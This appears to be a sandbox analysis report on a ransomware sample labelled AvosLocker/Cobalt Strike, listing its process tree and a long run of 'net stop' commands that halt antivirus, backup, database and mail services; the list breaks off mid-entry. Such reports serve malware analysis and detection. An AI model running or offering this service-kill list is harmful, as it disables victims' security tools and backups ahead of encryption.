PID 3264 wrote to memory of 4104 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 4104 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 4104 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 4104 wrote to memory of 948 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4104 wrote to memory of 948 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4104 wrote to memory of 948 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3264 wrote to memory of 3832 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 3832 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 3832 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3832 wrote to memory of 4620 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3832 wrote to memory of 4620 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3832 wrote to memory of 4620 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3264 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 620 wrote to memory of 1204 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 620 wrote to memory of 1204 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 620 wrote to memory of 1204 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3264 wrote to memory of 4996 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 4996 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 4996 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 4996 wrote to memory of 1876 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4996 wrote to memory of 1876 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4996 wrote to memory of 1876 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3264 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 4368 wrote to memory of 64 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4368 wrote to memory of 64 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4368 wrote to memory of 64 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3264 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2132 wrote to memory of 3852 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2132 wrote to memory of 3852 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2132 wrote to memory of 3852 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3264 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2912 wrote to memory of 5076 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2912 wrote to memory of 5076 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2912 wrote to memory of 5076 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3264 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2396 wrote to memory of 1952 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2396 wrote to memory of 1952 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2396 wrote to memory of 1952 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3264 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3056 wrote to memory of 4500 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3056 wrote to memory of 4500 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3056 wrote to memory of 4500 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3264 wrote to memory of 4512 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 4512 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 4512 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 4512 wrote to memory of 4024 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4512 wrote to memory of 4024 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4512 wrote to memory of 4024 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3264 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3264 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2436 wrote to memory of 2160 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe

"C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe"

C:\Windows\SysWOW64\net.exe

net stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net.exe

net stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Agent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Agent" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos AutoUpdate Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos AutoUpdate Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Clean Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Clean Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Device Control Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Device Control Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos File Scanner Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos File Scanner Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Health Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Health Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos MCS Agent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos MCS Agent" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos MCS Client" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos MCS Client" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Message Router" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Message Router" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Safestore Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Safestore Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos System Protection Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos System Protection Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Web Control Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Web Control Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Symantec System Recovery" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Symantec System Recovery" /y

C:\Windows\SysWOW64\net.exe

net stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net.exe

net stop "AcronisAgent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "AcronisAgent" /y

C:\Windows\SysWOW64\net.exe

net stop "AcrSch2Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "AcrSch2Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "Antivirus" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Antivirus" /y

C:\Windows\SysWOW64\net.exe

net stop "ARSM" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ARSM" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecAgentAccelerator" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecAgentAccelerator" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecAgentBrowser" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecAgentBrowser" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecDeviceMediaService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecDeviceMediaService" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecJobEngine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecJobEngine" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecManagementService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecManagementService" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecRPCService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecRPCService" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecVSSProvider" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecVSSProvider" /y

C:\Windows\SysWOW64\net.exe

net stop "bedbg" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "bedbg" /y

C:\Windows\SysWOW64\net.exe

net stop "DCAgent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "DCAgent" /y

C:\Windows\SysWOW64\net.exe

net stop "EPSecurityService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EPSecurityService" /y

C:\Windows\SysWOW64\net.exe

net stop "EPUpdateService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EPUpdateService" /y

C:\Windows\SysWOW64\net.exe

net stop "EraserSvc11710" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EraserSvc11710" /y

C:\Windows\SysWOW64\net.exe

net stop "EsgShKernel" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EsgShKernel" /y

C:\Windows\SysWOW64\net.exe

net stop "FA_Scheduler" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "FA_Scheduler" /y

C:\Windows\SysWOW64\net.exe

net stop "IISAdmin" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "IISAdmin" /y

C:\Windows\SysWOW64\net.exe

net stop "IMAP4Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "IMAP4Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "macmnsvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "macmnsvc" /y

C:\Windows\SysWOW64\net.exe

net stop "masvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "masvc" /y

C:\Windows\SysWOW64\net.exe

net stop "MBAMService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MBAMService" /y

C:\Windows\SysWOW64\net.exe

net stop "MBEndpointAgent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MBEndpointAgent" /y

C:\Windows\SysWOW64\net.exe

net stop "McAfeeEngineService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McAfeeEngineService" /y

C:\Windows\SysWOW64\net.exe

net stop "McAfeeFramework" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McAfeeFramework" /y

C:\Windows\SysWOW64\net.exe

net stop "McAfeeFrameworkMcAfeeFramework" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McAfeeFrameworkMcAfeeFramework" /y

C:\Windows\SysWOW64\net.exe

net stop "McShield" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McShield" /y

C:\Windows\SysWOW64\net.exe

net stop "McTaskManager" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McTaskManager" /y

C:\Windows\SysWOW64\net.exe

net stop "mfemms" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mfemms" /y

C:\Windows\SysWOW64\net.exe

net stop "mfevtp" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mfevtp" /y

C:\Windows\SysWOW64\net.exe

net stop "MMS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MMS" /y

C:\Windows\SysWOW64\net.exe

net stop "mozyprobackup" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mozyprobackup" /y

C:\Windows\SysWOW64\net.exe

net stop "MsDtsServer" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MsDtsServer" /y

C:\Windows\SysWOW64\net.exe

net stop "MsDtsServer100" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MsDtsServer100" /y

C:\Windows\SysWOW64\net.exe

net stop "MsDtsServer110" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MsDtsServer110" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeES" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeES" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeIS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeIS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeMGMT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeMGMT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeMTA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeMTA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeSA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeSA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeSRS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeSRS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$BKUPEXEC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$BKUPEXEC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$ECWDB2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$ECWDB2" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PRACTICEMGT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PRACTICEMGT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SBSMONITORING" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SBSMONITORING" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SHAREPOINT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SHAREPOINT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$VEEAMSQL2012" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SBSMONITORING" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SBSMONITORING" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SHAREPOINT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SHAREPOINT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLSERVER" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLSERVER" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLServerADHelper100" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLServerADHelper100" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLServerOLAPService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLServerOLAPService" /y

C:\Windows\SysWOW64\net.exe

net stop "MySQL80" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MySQL80" /y

C:\Windows\SysWOW64\net.exe

net stop "MySQL57" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MySQL57" /y

C:\Windows\SysWOW64\net.exe

net stop "ntrtscan" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ntrtscan" /y

C:\Windows\SysWOW64\net.exe

net stop "OracleClientCache80" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "OracleClientCache80" /y

C:\Windows\SysWOW64\net.exe

net stop "PDVFSService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "PDVFSService" /y

C:\Windows\SysWOW64\net.exe

net stop "POP3Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "POP3Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "RESvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "RESvc" /y

C:\Windows\SysWOW64\net.exe

net stop "sacsvr" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "sacsvr" /y

C:\Windows\SysWOW64\net.exe

net stop "SamSs" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SysWOW64\net.exe

net stop "SAVAdminService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SAVAdminService" /y

C:\Windows\SysWOW64\net.exe

net stop "SAVService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SAVService" /y

C:\Windows\SysWOW64\net.exe

net stop "SDRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SysWOW64\net.exe

net stop "SepMasterService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SepMasterService" /y

C:\Windows\SysWOW64\net.exe

net stop "ShMonitor" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ShMonitor" /y

C:\Windows\SysWOW64\net.exe

net stop "Smcinst" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Smcinst" /y

C:\Windows\SysWOW64\net.exe

net stop "SmcService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SmcService" /y

C:\Windows\SysWOW64\net.exe

net stop "SMTPSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SMTPSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "SNAC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SNAC" /y

C:\Windows\SysWOW64\net.exe

net stop "SntpService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SntpService" /y

C:\Windows\SysWOW64\net.exe

net stop "sophossps" /y

C:\Windows\SysWOW64\net1.exe

